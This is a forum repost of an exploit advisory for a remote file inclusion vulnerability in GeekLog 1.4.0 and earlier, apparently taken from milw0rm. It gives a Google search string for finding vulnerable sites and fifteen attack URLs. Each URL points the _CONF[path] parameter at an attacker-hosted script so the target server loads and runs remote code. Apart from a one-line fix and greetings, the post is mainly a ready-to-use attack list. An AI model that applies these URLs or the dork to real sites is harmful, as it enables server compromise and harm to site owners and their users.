Jump to content
Guest Nemessis

[RST] GeekLog <= 1.4.0 (_CONF[path]) RFI

Recommended Posts

Guest Nemessis
Posted

http://www.milw0rm.com/exploits/1963

---------------------------------------------------------------------------

GeekLog <= 1.4.0 (_CONF[path]) Remote File Include Vulnerabilities

---------------------------------------------------------------------------

Google d0rk: "powered by geeklog"

Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RoSecurityGroup.net :

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : GeekLog

version : latest version [ 1.4 ]

URL : http://www.geeklog.net/

------------------------------------------------------------------

Exploit:

~~~~~~~~

Variable $_CONF[path] not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.

were [path] on some cases => www.site.com/[path]/public_html/index.php

# http://www.site.com/[path]/plugins/links/functions.inc?_CONF[path]=[Evil_Script]

# http://www.site.com/[path]/plugins/polls/functions.inc?_CONF[path]=[Evil_Script]

# http://www.site.com/[path]/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=[Evil_Script]

# http://www.site.com/[path]/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=[Evil_Script]

# http://www.site.com/[path]/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=[Evil_Script]

# http://www.site.com/[path]/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=[Evil_Script]

# http://www.site.com/[path]/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=[Evil_Script]

# http://www.site.com/[path]/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=[Evil_Script]

#http://www.site.com/[path]/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=[Evil_Script]

# http://www.site.com/[path]/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=[Evil_Script]

# http://www.site.com/[path]/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=[Evil_Script]

# http://www.site.com/[path]/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=[Evil_Script]

# http://www.site.com/[path]/plugins/spamx/Import.Admin.class.php?_CONF[path]=[Evil_Script]

# http://www.site.com/[path]/plugins/spamx/LogView.Admin.class.php?_CONF[path]=[Evil_Script]

# http://www.site.com/[path]/plugins/staticpages/functions.inc?_CONF[path]=[Evil_Script]

---------------------------------------------------------------------------

Solution :

~~~~~~~~~~

declare variabel $_CONF[path]

---------------------------------------------------------------------------

Shoutz:

~~~~~~

# Special greetz to my good friend [Oo]

# To all members of h4cky0u.org ;) and RST [ hTTp://rstcenter.com ]

---------------------------------------------------------------------------

*/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...